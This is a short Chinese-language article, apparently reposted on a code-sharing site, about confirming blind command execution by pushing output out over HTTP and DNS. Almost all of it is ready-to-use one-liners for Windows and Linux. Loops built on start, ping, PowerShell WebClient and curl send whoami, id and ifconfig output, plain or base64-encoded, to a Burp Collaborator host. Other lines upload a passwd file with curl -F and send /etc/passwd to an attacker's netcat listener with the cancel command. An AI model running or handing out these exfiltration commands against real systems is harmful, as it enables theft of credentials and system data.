利用HTTP、DNS通道測試無回顯的命令執行


windows下通過start命令

for /F %X in ('whoami') do start http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/%X

會使用默認瀏覽器打開http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/laptop-k77ue954/hp

從burpsuite get請求的uri可以看到whoami內容.

windows下通過ping命令

for /F %i in ('whoami') do ping -n 1 %i.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

發現當當前用戶名中帶有\時會出現找不到主機,因為域名不可能存在\字符,隨采用下面命令更為妥當。

for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

這樣把\做分隔符取后面的值ping只顯示出hp。

windows存在powershell的情況下

使用powershell進行base64編碼並進行http請求

for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/'+$a);

linux下通過ping命令

ping `whoami`.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

ping命令結合base64編碼

ping $(id|base64).uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

linux下通過curl命令

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/`whoami`

curl命令結合base64編碼

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/$(id|base64)

遇到有換行等情況下把\n替換為-

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/$(ifconfig|base64|tr '\n' '-')


復制出來把-替換為空

然后base64解碼

linux下使用curl -F參數

curl -X POST -F xx=@passwd http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

linux下使用cancel命令

攻擊機nc監聽一個端口,靶機執行命令

cancel -u "$(cat /etc/passwd)" -h xxx.2x0.xxx.69:2333


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM